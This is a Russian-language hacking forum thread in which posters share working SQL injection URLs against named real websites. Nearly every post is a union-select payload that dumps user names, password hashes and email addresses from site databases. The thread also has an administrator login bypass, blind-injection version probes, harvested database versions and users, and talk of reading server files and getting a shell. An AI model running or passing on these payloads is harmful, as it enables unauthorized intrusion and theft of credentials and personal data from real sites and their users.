SQL Инъекции

Подобрал кол-во столбцов:

Code:

http://top.kmvcity.ru/stat.php?id=1'union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/*

Попробуй угадать таблицы

 

большая бд

Code:

http://www.comicbookresources.com/news/newsitem.cgi?id=-11511+union+select+1,2,3,4,concat_ws(0x203a20,id,name,password,email),6,7,8+from+users+limit+16000,1/*

 

инъекция тут

Code:

http://www.dog.ru/index.php3?mode=5&id=417652+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*

таблица users

 

Code:

http://www.dog.ru/index.php3?mode=5&id=417652--00+union+select+1,2,3,4,5,concat(name,char(58),passwd,char(58),email,char(58),id,char(58),version(),char(58),user(),char(58),database()),7,8,9,10,11,12,13,14%20from%20users%20limit%200,1/*

+table "search"

 

http://www.flashonthebeach.com

 

Code:

http://fckhimki.ru/modules/players/print.php?current_id=&player_id=-1+union+select+1,2,3,4,5,6,concat(name,char(58),height,char(58),weight,char(58),country,char(58),position),8,9,10,11,12,13,14,15,16,17,18,19,20+from+players+limit+0,1/*

база: fckhimki_new1;
версия: 4.0.27-max-log;
юзер: [email protected]

К базам mysql и forum подобраться не получиться, зато
можно поиздеваться над таблицами news и players

 

http://www.sat-tv.ru

 

Вот подобрано количество полей:

Но он на такой запросы выдаёт:

Как это обойти я не допёр...

 

http://gorodclub.ru/adm/forum/home.viewprofile.php?user=-1'+union+select+1,2,3,4,5,6/*
странно, но ни 1 названия не мог подобрать
зато в админку зашел стандартным ' or 'a'='a (;

 

http://m.wazzap.ru/m/photo/?code=46b2bdffwfcodusoij&id=%27

select photo_id, photo_desc from mf_user_photo where user_id=' and photo_visible='Y' LIMIT 0, 5

это иньекция?

 

2 ruzzer
Вот иньекция
http://m.wazzap.ru/m/photo/?id=-72813%20union%20select%201,TABLE_NAME%20from%20INFORMATION_SCHEMA.TABLES/*

 

Небольшая мыльная база

Code:

http://www.spbgid.ru/index.php?type=-1+union+select+1,mail,3+from+mail/*

+ как всегда, таблица 'news'
З.Ы. Должна быть еще таблица кампаний(тоже с мыльниками), но я не нашел...

 

Слепая sql-inj, кроме таблицы news и колонки n_id ничего не подобрал..., а ещё есть колонки o_id и rc_id, только вот в каких таблицах? Имхо должны быть таблицы авторов и оппонентов, если я правильно понял из самого сайта...

Code:

http://www.ortodoxmedia.com/autor.php?autor=-1+union+select+1,user(),n_id,4,5,version()+from+news+where+n_id=15/*

ЗЫ Может кто копнёт поглубже? Подгузка файла (load_file()) тут сработает?

Code:

http://sololiteratura.com/php/autor.php?id=-1+union+select+user(),version(),null/*

 

Code:

_http://www.textdiebe.de/werkstatt/autor.php?autor=-1234+union+select+1,2,3,4,user(),version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35/*

Code:

_http://www.entornoarte.com:81/ea/autor.php?id=-1+union+select+concat(user(),version()),2/*

Чтоб увидеть значения, наведите мышкой на отсутствующий рисунок.

Code:

_http://digital.el-esceptico.org/autor.php?autor=635+order+by+3/* - всё ок!
_http://digital.el-esceptico.org/autor.php?autor=635+order+by+4/* - ошибка!

То есть число столбцов как бы = 3
но почему тогда:

Code:

_http://digital.el-esceptico.org/autor.php?autor=635+union+select+1,2,3/*

ЗЫ Дак сколько там столбцов?

 

Code:

http://media.utmn.ru/news.php?show_news=-1+union+select+concat(nick,char(58),pwd,char(58),email)+from+users/*

в поле 'pwd' лежат хеши

 

Столбцов как бы 3 только вот мускул 3 версии, соответственно union не поддерживает.

 

2 geezer.code
неД))

версия 4
http://digital.el-esceptico.org/autor.php?autor=635+and+(ascii(substring(VERSION(),1,1))=52)

2 -=lebed=-
может там 2 запроса.. в одном 3 столбца, а во втором нет

 

а вот тут все ок.. кста потвердилась моя версия

4.1.21*eed-lectura@localhost*esceptico

 

pr=4
www.solar-ct.com

Code:

http://www.catalogue.solar-ct.com/plugins/catalog/catalog_view.php?id=-23+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,user_name,user_loginname,user_password,user_email),10,11,12,13,14,15,16,17,18,19+from+solar_user+limit+0,1/*

brigada.uz

Code:

http://brigada.uz/plugins/ansmt/ansmt_view.php?id=-44+union+select+1,2,3,4,5,6,concat_ws(0x3a,user_name,user_loginname,user_password,user_email,user_hideemail,user_join,user_ip,version()),8,9,10,11,12,13,14+from+brigada_user

пароли в хэше... писала одна и та же студия ))) поищу ещще что нить у них.

 

Вот решил запостить, мне понравилось тут раскапывать. Интересно работать с пятой версией мускула но...
Таблицы найдены, пароли получены, вот только куда их подставлять я не нашел - может кто докопает. Я эту скулю у себя хранил долго, покуда не разузнал про пятую версию мускула, а потом ковырялся в старых залежах набрал version() и о чудо 5.ХХ.ХХ, а это значит можно узнать все таблицы и т.д.!!!!!
Вот кстати и таблички

Жаль до шелла не дошло.... может кто???..., а нет так и ладно